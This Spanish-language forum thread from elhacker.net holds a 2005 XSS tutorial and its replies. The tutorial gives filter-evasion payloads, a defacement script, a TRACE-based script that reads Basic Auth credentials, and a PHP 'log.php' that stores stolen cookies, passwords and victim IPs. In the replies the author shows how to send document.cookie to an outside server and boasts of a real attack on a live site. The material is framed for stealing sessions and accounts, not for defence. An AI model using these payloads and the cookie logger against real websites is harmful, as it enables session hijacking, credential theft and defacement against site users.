elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  Los Poderes Secretos de XSS (Cross Site Scripting)
0 Usuarios y 2 Visitantes están viendo este tema.
Encuesta
Pregunta: Que te pareció este manual?
Malisimo :(
Malo
No aprendí nada
Bueno
Buenisimo :)

Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: Los Poderes Secretos de XSS (Cross Site Scripting)  (Leído 69,410 veces)
sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Los Poderes Secretos de XSS (Cross Site Scripting)
« en: 9 Diciembre 2005, 05:02 am »

Los Poderes Secretos de XSS por
.


XSS aka Cross Site Scripting es el ataque basado en la explotacion de vulnerabilidades de el sistema de validación de HTML incrustado.
El problema es que normalmente no se valida correctamente, esta vulnerabilidad puede estar de forma directa (foros, mensajes de error, etc..) o indirecta (redirecciones, framesets, etc..)
cada una se trata de forma diferente:

TipoManejo
DirectaEste tipo de XSS, es el que normalmente es censurado, asi que es muy poco comun que puedas usar tags como <script o <iframe, sinembargo nunca es malo probar, para ver formas de pasar estas protecciones, debes de saber mas de HTML que el creador del sitio
IndirectaEsta es un tipo de vulnerabilidad, muy comun, y muy poco explotada, consiste en modificar valores que la aplicacion web utiliza para pasar variables entre 2 paginas, sin usar sesiones.

Indirecta
Explicare primero la Indirecta, ya que es la menos censurada.
Esta sucede cuando hay un mensaje o una ruta en la URL del navegador o en la cookie.
para saber el contenido de una cookie, sin usar ningun tipo de iecv o addin para tu navegador, puedes usar el siguiente script, solo colocalo en la barra de direcciones, y presiona Enter.
Código:
javascript:void(document.cookie=prompt("Modifica el valor de la cookie",document.cookie).split(";"));
una vez dentro podras modificar la cookie a tu antojo, si pones cancelar la cookie se borrará.
ahora, que podemos ver con este ejemplo?
que podemos meter comandos javascript solo modificando una URL, como puedes aventajarte de esto?

Usando FrameSets
bien, regresemos al ejemplo de el frameset, que segun la pagina que coloques te crea un frame a esa pagina.
que pasara si pones, en esa URL
Código:
javascript:while(1)alert("Te estoy floodeando");
y el link, lo pones en un foro, un navegador incauto, va a verlo y dira, bueno, es del mismo dominio, no puede ser nada malo.. y de resultado tendra un loop infinito.

Ahora, hasta ahi llegan los newbies, pero vamos a evolucionar un poco, ahora, que tal que pones un script que tome tu cookie, y mande un mp a el administrador, o incluso, que borre todos tus post en X foro, todo esto es posible.. y solo necesita un poco de imaginación.
Ahora lo que va.. el robo de cookies, es lo mas basico, y tiene como objetivo robar la cookie.. me diran, y eso de que sirve? tengo el PHPSESSID, y si el usuario ciera sesion no me servira de nada.
tienes razon, pero por ejemplo, con el uso de la libreria cURL un usuario malintencionado, podria al recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda entrar como tu, sin siquiera necesitar tu password.. esto va cobrando seriedad no?
ahora que mas?
Otro uso comun para estas vulnerabilidades es lograr hacer phishing, o colocar un Xploit..
tu ves la barra de direcciones, y ves que estas en una pagina, pero realmente estas en otra.. metes tu pass, y ya valiste.
Pero lo que me gusta mas, son los sitios de descarga, que colocan en la misma url, el sitio de objetivo.. esas paginas, son vulnerables a ataques XSS indirectos directos xD
osea, puedes colocar una imagen con link al sitio malicioso, y se ejecuta, sin que el usuario lo sepa.
Incluso PODIAS borrar un post en phpBB, o hacerte admin (era posible, no me molesten, claro que si), con este tipo de vulnerabilidad.
Ahora, vamos al siguiente tipo indirecto.

Mensaje personalizado
Estas, son forsosamente para links, no funciona en imagenes (al menos no he visto ninguna que sirva.) y va en esta forma:
Código:
error.php?error=Usuario%20Invalido
esa pagina, es vulnerable a XSS Indirecto.
con esto puedes meter casi lo que sea ahi dentro.
un <script> que te cree otra sesion bajo otro usuario, y tu sesion actual la mande a el atacante (es lo que explicaba de cURL hace un momento), o lo que sea.. aqui hay muy pocas limitantes.
Voy a explicar como puedes modificar TODA la pagina, osea todo su aspecto, con una vunerabilidad como esta.
con este codigo, se borra todo el contenido de la pagina, y escribe otra cosa:
Código:
<script>
document.documentElement.innerHTML="DEFACED";
</script>
muy complicado?
esto tiene muchos usos potenciales..

Directa
Esta es la mas divertida, y es cuando en por ejemplo.. un foro como este puedo meter un tag, y ejecutar un codigo, que pueda hacer casi lo mismo, o lo mismo que el Indirecto de Mensaje.
Funciona localizando puntos debiles en la programación de los filtros, asi que si por ejemplo, logran quitar los <iframe, <script etc.. siempre puedes poner un <div malicioso, o incluso un <u> o <s>, etc.. tags que casi siempre estan permitidos.
Esto pone los pelos de punta a muchos webmasters, afortunadamente, muchos no saben del "lado obscuro" de HTML + IExplorer :)
colocare una sección del CheatSheet de RSnake (http://ha.ckers.org/xss.html)
Citar
Código:
Embedded tab to break up the cross site scripting attack: <IMG SRC="jav ascript:alert('XSS');">
Código:
Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
Código:
Spaces and meta chars before the javascript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal):
<IMG SRC=" &#14; javascript:alert('XSS');">
Código:
Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes any non-alpha-non-digit is a non-valid after an HTML and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT&XSS\s":
<SCRIPT&XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Código:
INPUT image:
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Entre muchos otros, les recomiendo, que cuando busquen vulnerabilidades XSS, entren a esa página muy buena recopilación., voy a profundizar en ún tipo de esos ataques.
Código:
<BR SIZE="&{alert('XSS')}">
<FK STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
usar Style es increiblemente facil de usar, y muchos filtros son vulnerables.
quien se va a imaginar que puedes meter cosas en este!! pues ya ven.. si puedes :)
logicamente no vas a meter todo en el espacio que tienes, puedes usar:
Código:
eval(this.fu)
y en el div, agregar un campo "fu" con el codigo
<div fu="alert('Hola');" STYLE="background-image: url(javascript:eval(this.fu))">

AJAXSS
Este es un tipo de XSS no tan conocido, pero peligroso.
se basa en usar cualquier tipo de vulnerabilidad para introducir un objeto XMLHTTP y desde ahi enviar contenido POST, GET, etc.. automaticamente, sin conocimeinto del usuario, un Bug de XSS, usando esta tecnica en MySpace de MSN, permitio que una persona, lograra tener mucha fama (y es que pudo haber hecho cosas malas, afortunadamente solo hizo esto)
El potencial de este tipo de ataque es infinitamente alto, asi que "Be scared", porque parece ser que tiene un futuro prometedor.

El siguiente script obtiene el valor de las cabezeras de autenticacion de un sistema basado en Basic Auth. solo habria que decodificarlo, pero es mas facil mandarlo codificado a tu log de contraseñas, la codificacion es base64.

Código:
var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.open("TRACE","./",false);
xmlhttp.send();
str1=xmlhttp.responseText;
splitString = str1.split("Authorization: Basic ");
str2=splitString[1];
str3=str2.split("Cache");
alert(str3);

log.php para registrar cookies
Código:
<?php
$archivo = fopen('log2.htm','a');

$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");

fwrite($archivo, '
USUARIO Y PASSWORD: '.base64_decode($usuario).'
Cookie: '.$cookie.'
Pagina: '.$re.'
 IP: ' .$ip. '
 Fecha y Hora: ' .$fecha. '</hr>');

fclose($archivo);
?>

Links
  • Anexo(ADB.htm) -Codificador URL, UTF-8 y de Entidades HTML
  • Anexo(EUU.htm) -Codificador Hexadecimal, Decimal, Binario
  • Anexo(b64.htm) -Codificador y decodificador de Base64 y Radix64
  • http://ha.ckers.org/xss.html -Gran recopilatorio de ataques XSS comunes

Citar
(c) Sirdarckcat 2005
Autorizo la reproduccion total o parcial de este documento de acuerdo con la licencia de documentación libre de GNU, una copia puede ser encontrada en http://www.gnu.org/


« Última modificación: 16 Agosto 2011, 07:37 am por sirdarckcat » En línea

whaky

Desconectado Desconectado

Mensajes: 150


Angel del Infierno


Ver Perfil
Re: Manual de XSS
« Respuesta #1 en: 15 Diciembre 2005, 15:36 pm »

muy buen manual.
es sobre un tema que no manejo bien y esto seguro ayuda :D


En línea

Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.505



Ver Perfil
Re: Manual de XSS
« Respuesta #2 en: 17 Diciembre 2005, 14:16 pm »

Ahora me lo leere y votare aunque seguro que es muy bueno.
En línea

$$doctor$$

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #3 en: 28 Diciembre 2005, 12:27 pm »

 :-* tendre que mirarlo detalladamente para enterarme mejor,pero parece util.gracias por postearlo!!
En línea

knk.ink

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #4 en: 31 Diciembre 2005, 03:23 am »

Hola como utilizaria el  log.php para guardar una cookie? :huh:

por que solo abriendolo ej. www.site.com/log.php  solo te guarda esto
Código:
USUARIO Y PASSWORD:
Cookie:
Pagina:
IP: XXX.XXX.XX.XXX
Fecha y Hora: 31 December, 2005, 3:15 am
Como seria la url para que se guarde la cookie?
no es algo asi de  "www.site.com/log.php?variablenosecual=document.cookie no se que mas"

Alguien me explica?

Por favor.
Saludos ;D ;D ;D
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #5 en: 31 Diciembre 2005, 05:35 am »

Hola como utilizaria el log.php para guardar una cookie? :huh:

por que solo abriendolo ej. www.site.com/log.php solo te guarda esto
Código:
USUARIO Y PASSWORD:
Cookie:
Pagina:
IP: XXX.XXX.XX.XXX
Fecha y Hora: 31 December, 2005, 3:15 am
Como seria la url para que se guarde la cookie?
no es algo asi de "www.site.com/log.php?variablenosecual=document.cookie no se que mas"

Alguien me explica?

Por favor.
Saludos ;D ;D ;D

sitio.com/log.php?c=cookie
sitio.com/log.php?id=basicauth

Saludos!!
En línea

programatrix


Desconectado Desconectado

Mensajes: 3.287


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #6 en: 3 Enero 2006, 14:31 pm »

Una cosa que no me queda clara aun es como si el usuario abre la web malefica:
¿como se le roba la cookie y la puedes guardar en tu servidor?
O sea que al abrir la web con el codigo html inyectado se habra otra ventana donde esta la url de mi modulo php y la variable sea igual a la cookie.
Saludos  ::)
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #7 en: 4 Enero 2006, 19:23 pm »

con un script..

las cookies se pueden acceder desde javascript, con la variable
document.cookie

mira, escribe esto en la barra de direcciones de tu navegador:
javascript:alert(document.cookie);

de hecho hay una manera de sacar el IP y el referrer xD pero eso no sirve denada.. si lo vas a enviar a un log, porque PHP los saca solito

hace poco morris y yo estabamos haciendo un ataque con una vulnerabilidad de XSS, nos banearon pero seguiamos hasta que parchearon el bug :(, aun asi el ataque fue un exito ;) y ahora no puedes entrar a esa pagina desde México xDDD usabamos XMLHTTP o AJAX, y si el usuario usaba IE6 podiamos sacar su password jaja, era todo un desm*dr3 xD

Saludos!!
En línea

programatrix


Desconectado Desconectado

Mensajes: 3.287


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #8 en: 4 Enero 2006, 19:31 pm »

Ya, pero me refiero a que he visto a veces esto:
Citar
javascript:http://servidor.com/carpeta/fichero.php?variable=document.cookie
Eso seria desde el navegador en la ruta de direcciones, pero como seria que automaticamente al visitar la web se hiciera eso.
Saludos  ::)
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #9 en: 4 Enero 2006, 19:45 pm »

Código:
javascript:http://servidor.com/carpeta/fichero.php?variable=document.cookie
enserio viste eso?
eso no va a servir
es algo asi:
Código:
self.location.href="http://servidor.com/carpeta/fichero.php?variable="+document.cookie;
:)

Saludos!!
En línea

Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cross Site Scripting (XSS)
Nivel Web
yeikos 3 6,843 Último mensaje 28 Mayo 2007, 05:59 am
por Man-In-the-Middle
Cross Site Scripting en Myspace.com
Nivel Web
keype 6 4,933 Último mensaje 26 Abril 2007, 18:15 pm
por Crack_X
Cross Site Scripting « 1 2 »
Nivel Web
berni69 11 8,515 Último mensaje 20 Julio 2007, 16:24 pm
por Tengu
Cross Site Scripting
Nivel Web
pelonms7 6 6,518 Último mensaje 7 Marzo 2011, 03:20 am
por pelonms7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines